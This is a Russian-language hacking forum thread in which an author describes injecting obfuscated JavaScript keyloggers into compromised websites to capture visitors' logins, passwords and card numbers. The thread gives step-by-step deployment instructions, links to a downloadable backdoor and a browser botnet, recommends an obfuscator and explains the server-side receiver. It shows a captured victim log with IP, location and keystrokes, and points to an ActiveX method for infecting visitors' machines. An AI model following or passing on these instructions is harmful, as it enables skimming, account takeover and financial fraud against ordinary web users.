 |
|
08.02.2018, 22:36
|
|
Новичок
Регистрация: 24.10.2017
Сообщений: 0
С нами:
4502036
Репутация:
0
|
|
482 сайта из топа Alex перехватывают, каждое нажатие клавиш, собирают информация о вашем браузере, ширине экрана, раскладки клавиатуры. Чтобы собирать о вас данные они используют javascript код. .По умолчанию скрипты этих компаний записывают все данные, которые пользователи вводят в различные формы, включая ФИО, email-адреса, телефонные номера, номера социального страхования, даты рождения. Более того, реальное число таких сайтов должно намного превышать изученные несколько сотен, так как ресурсы за пределами топ-50000 специалисты вообще не рассматривали.
Но на самом деле можно намного больше. Допустим на скомпрометированным сайте расположены форма регистрации, где просят указать, mail или телефон, само собой логин и пароль ну и допустим номер банковской карты. Так один разработчик вставил бэкдор в 20 000 сайтов. По данным полиции, с помощью своих бэкдоров разработчик похищал чужие пароли и юзернеймы, а затем использовал их, чтобы получить доступ к чужим аккаунтам в социальных сетях и почтовым ящикам. После злоумышленник убеждал друзей и близких своей жертвы перевести ему деньги. Также хакер регистрировал аккаунты на игорных сайтах, используя личные данные жертв, и совершал покупки в интернет-магазинах за чужой счет. Сообщается, что жертвами злоумышленника стали не только частные лица, но и ряд компаний.
Злоумышленник вставляет вредоносный javascript код, который собирает информацию из всех этих форм, записывает каждое нажатие клавиши и передает на удаленный сервер. Полученную информацию он может продать на каком-нибудь форуме. Такие данные стоят намного больше, чем допустим размещение рекламы на взломанном сайте. А если еще и улучшить бэкдор, то можно незаметно заражать каждую машину пользователя, собирать его cookie. Можно получить доступ к аккаунтам соц. сетям или дать ему zip-bomb. Zip-бомба, также известная как Архив Смерти или англ. decompression bomb— архивный файл, который по своей природе обладает разрушающим действием. При распаковке может вызвать крах системы. А теперь перейдем к практики.
Качаем отсюда бэкдор: https://pastebin.com/WZEJLTN7. Далее везде, где есть http://дописываем адрес сервера куда передаваться данные. Обфусифицируем код и вставляем на страницу сайта. Проверить работу бэкдора можно самому перейдя на вредоносную страницу. Если все пройдет удачно, то на ваш сервер передастся информацию о вас.
Есть еще один бэкдор, т.е бот. Ссылка: https://github.com/4k-developer/4K-Botnet . Он более функционален и имеет возможность вставлять заголовки, майнить криптовалюту, убивать браузер и еще кучу интересностей.
Для борьбы со слежкой на сайтах есть плагин: ghostery . |
|
|
08.02.2018, 22:52
|
|
Новичок
Регистрация: 07.02.2018
Сообщений: 0
С нами:
4348533
Репутация:
0
|
|
DefWolf сказал(а):
482 сайта из топа Alex перехватывают, каждое нажатие клавиш, собирают информация о вашем браузере, ширине экрана, раскладки клавиатуры. Чтобы собирать о вас данные они используют javascript код. .По умолчанию скрипты этих компаний записывают все данные, которые пользователи вводят в различные формы, включая ФИО, email-адреса, телефонные номера, номера социального страхования, даты рождения. Более того, реальное число таких сайтов должно намного превышать изученные несколько сотен, так как ресурсы за пределами топ-50000 специалисты вообще не рассматривали.
Но на самом деле можно намного больше. Допустим на скомпрометированным сайте расположены форма регистрации, где просят указать, mail или телефон, само собой логин и пароль ну и допустим номер банковской карты. Так один разработчик вставил бэкдор в 20 000 сайтов. По данным полиции, с помощью своих бэкдоров разработчик похищал чужие пароли и юзернеймы, а затем использовал их, чтобы получить доступ к чужим аккаунтам в социальных сетях и почтовым ящикам. После злоумышленник убеждал друзей и близких своей жертвы перевести ему деньги. Также хакер регистрировал аккаунты на игорных сайтах, используя личные данные жертв, и совершал покупки в интернет-магазинах за чужой счет. Сообщается, что жертвами злоумышленника стали не только частные лица, но и ряд компаний.
Злоумышленник вставляет вредоносный javascript код, который собирает информацию из всех этих форм, записывает каждое нажатие клавиши и передает на удаленный сервер. Полученную информацию он может продать на каком-нибудь форуме. Такие данные стоят намного больше, чем допустим размещение рекламы на взломанном сайте. А если еще и улучшить бэкдор, то можно незаметно заражать каждую машину пользователя, собирать его cookie. Можно получить доступ к аккаунтам соц. сетям или дать ему zip-bomb. Zip-бомба, также известная как Архив Смерти или англ. decompression bomb— архивный файл, который по своей природе обладает разрушающим действием. При распаковке может вызвать крах системы. А теперь перейдем к практики.
Качаем отсюда бэкдор: https://pastebin.com/WZEJLTN7. Далее везде, где есть http://дописываем адрес сервера куда передаваться данные. Обфусифицируем код и вставляем на страницу сайта. Проверить работу бэкдора можно самому перейдя на вредоносную страницу. Если все пройдет удачно, то на ваш сервер передастся информацию о вас.
Есть еще один бэкдор, т.е бот. Ссылка: https://github.com/4k-developer/4K-Botnet . Он более функционален и имеет возможность вставлять заголовки, майнить криптовалюту, убивать браузер и еще кучу интересностей.
Для борьбы со слежкой на сайтах есть плагин: ghostery .
Довольно интересно
|
|
|
|
28.02.2018, 20:55
|
|
Новичок
Регистрация: 01.02.2018
Сообщений: 0
С нами:
4357791
Репутация:
0
|
|
У кого-то получилось запустить первую утилиту? Какие логи приходят?
|
|
|
|
28.02.2018, 23:23
|
|
Новичок
Регистрация: 24.10.2017
Сообщений: 0
С нами:
4502036
Репутация:
0
|
|
OneTrust сказал(а):
У кого-то получилось запустить первую утилиту? Какие логи приходят?
Могу показать на localhost или на реальном сайте ? Разницы нет
|
|
|
|
28.02.2018, 23:27
|
|
Новичок
Регистрация: 24.10.2017
Сообщений: 0
С нами:
4502036
Репутация:
0
|
|
Max2 сказал(а):
можно поподробней на какой сайт(свой?) и чем и как обфусцировать?
Допустим вот: http://wb0.ru/phpobf.php . Бэкдор вставляешь на зараженный сайт, а файл который будет принимать запросы на свой сервер или на другой зараженный сайт:
PHP:
|
|
|
|
28.02.2018, 23:51
|
|
Новичок
Регистрация: 24.10.2017
Сообщений: 0
С нами:
4502036
Репутация:
0
|
|
Если не будет работать сохраните файл и бэкдор на одном сайте !!!
|
|
|
|
28.02.2018, 23:56
|
|
Новичок
Регистрация: 24.10.2017
Сообщений: 0
С нами:
4502036
Репутация:
0
|
|
Max2 сказал(а):
какие логи приходят?
Он записывает в файл 1.txt Информацию
---- Добавлено позже ----
Info: ({"as":"AS14061 DigitalOcean, LLC","city":"Toronto","country":"Canada","countryC ode":"CA","isp":"Digital Ocean","lat":43.6555,"lon":-79.3626,"org":"Digital Ocean","query":"138.197.174.154","region":"ON","re gionName":"Ontario","status":"success","timezone": "America/Toronto","zip":"M5A"});Win32Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.119 Safari/537.36ruInfo: ({"as":"AS14061 DigitalOcean, LLC","city":"Toronto","country":"Canada","countryC ode":"CA","isp":"Digital Ocean","lat":43.6555,"lon":-79.3626,"org":"Digital Ocean","query":"138.197.174.154","region":"ON","re gionName":"Ontario","status":"success","timezone": "America/Toronto","zip":"M5A"});1
---- Добавлено позже ----
1 это клавиша которую я нажал
|
|
|
|
28.02.2018, 23:58
|
|
Новичок
Регистрация: 24.10.2017
Сообщений: 0
С нами:
4502036
Репутация:
0
|
|
WIn32 - система
Дальше юзерагент и язык
|
|
|
|
06.04.2018, 23:36
|
|
Новичок
Регистрация: 24.10.2017
Сообщений: 0
С нами:
4501243
Репутация:
0
|
|
DefWolf сказал(а):
А если еще и улучшить бэкдор, то можно незаметно заражать каждую машину пользователя
а как это сделать?
|
|
|
|
07.04.2018, 00:39
|
|
Новичок
Регистрация: 24.10.2017
Сообщений: 0
С нами:
4502036
Репутация:
0
|
|
У Ondrik8 есть тема, где он использует Javascript + ActiveXObject("Shell.Application"), для загрузки бэкдора. Не забывай, что это уголовно наказуемо |
|
|
|
|
|
|
Предыдущая тема
Следующая тема
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
